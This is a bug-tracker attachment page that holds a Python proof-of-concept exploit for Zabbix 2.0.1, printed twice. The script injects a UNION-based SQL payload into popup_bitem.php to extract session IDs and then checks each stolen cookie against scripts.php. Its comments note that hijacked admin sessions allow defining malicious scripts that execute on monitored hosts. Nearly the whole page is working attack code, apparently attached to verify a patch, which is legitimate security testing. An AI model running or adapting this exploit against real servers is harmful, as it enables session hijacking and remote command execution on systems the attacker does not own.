Attachment 3302 Details for Bug 7277 – POC python script with indenting fixed.

POC python script with indenting fixed.

zabbix.test.py (text/plain), 2.17 KB, created by Dave Hodgins on 2012-12-30 21:51:01 CET

(hide)

Description:

Filename:

MIME Type:

Creator: Dave Hodgins

Created: 2012-12-30 21:51:01 CET

Size: 2.17 KB

patch

obsolete

>#!/usr/bin/python
> 
>import re
>import sys,urllib2,urllib
> 
>print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
>print "[*] http://www.offensive-security.com"
>print "##################################\n"
> 
>''' 
> 
>The sessions found by this tool may allow you to access the scripts.php file.
>Through this web interface, an administrator can define new malicious scripts. 
>These scripts can then be called from the maps area, and executed with "zabbix" permissions.
> 
>Timeline:
> 
>17 Jul 2012: Vulnerabilty reported
>17 Jul 2012: Reply received
>18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
>19 Jul 2012: Fixed for inclusion in version 2.0.2
> 
>'''
> 
>ip="127.0.0.1"
> 
>target = 'http://%s/zabbix/popup_bitem.php' % ip
>url = 'http://%s/zabbix/scripts.php' % ip
> 
>def sendSql(num):
>        global target
>        payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
>        payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
>        values = {'dstfrm':'1','itemid':payload }
>        url = "%s?%s" % (target, urllib.urlencode(values))  
>        req = urllib2.Request(url)                          
>        response = urllib2.urlopen(req)                 
>        data = response.read()                  
>        return data
> 
>def normal(cookie):
>        global url
>        req = urllib2.Request(url)
>        cook = "zbx_sessionid=%s" %cookie
>        req.add_header('Cookie', cook)
>        response = urllib2.urlopen(req)                 
>        data = response.read()                  
>        if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
>                return "FAIL"
>        else:
>                return "SUCCESS"
> 
>sessions=[]
> 
>for m in range(1,2):
>        print "[*] Searching sessions belonging to id %s" % m
>        hola=sendSql(m)
>        for l in re.findall(r"([a-fA-F\d]{32})", hola):
>            if l not in sessions:
>                sessions.append(l)
>                print "[*] Found sessionid %s - %s" % (l,normal(l))
>

#!/usr/bin/python
 
import re
import sys,urllib2,urllib
 
print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
print "[*] http://www.offensive-security.com"
print "##################################\n"
 
''' 
 
The sessions found by this tool may allow you to access the scripts.php file.
Through this web interface, an administrator can define new malicious scripts. 
These scripts can then be called from the maps area, and executed with "zabbix" permissions.
 
Timeline:
 
17 Jul 2012: Vulnerabilty reported
17 Jul 2012: Reply received
18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
19 Jul 2012: Fixed for inclusion in version 2.0.2
 
'''
 
ip="127.0.0.1"
 
target = 'http://%s/zabbix/popup_bitem.php' % ip
url = 'http://%s/zabbix/scripts.php' % ip
 
def sendSql(num):
        global target
        payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
        payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
        values = {'dstfrm':'1','itemid':payload }
        url = "%s?%s" % (target, urllib.urlencode(values))  
        req = urllib2.Request(url)                          
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        return data
 
def normal(cookie):
        global url
        req = urllib2.Request(url)
        cook = "zbx_sessionid=%s" %cookie
        req.add_header('Cookie', cook)
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
                return "FAIL"
        else:
                return "SUCCESS"
 
sessions=[]
 
for m in range(1,2):
        print "[*] Searching sessions belonging to id %s" % m
        hola=sendSql(m)
        for l in re.findall(r"([a-fA-F\d]{32})", hola):
            if l not in sessions:
                sessions.append(l)
                print "[*] Found sessionid %s - %s" % (l,normal(l))

Actions: View

Attachments on bug 7277: 2762 | 3302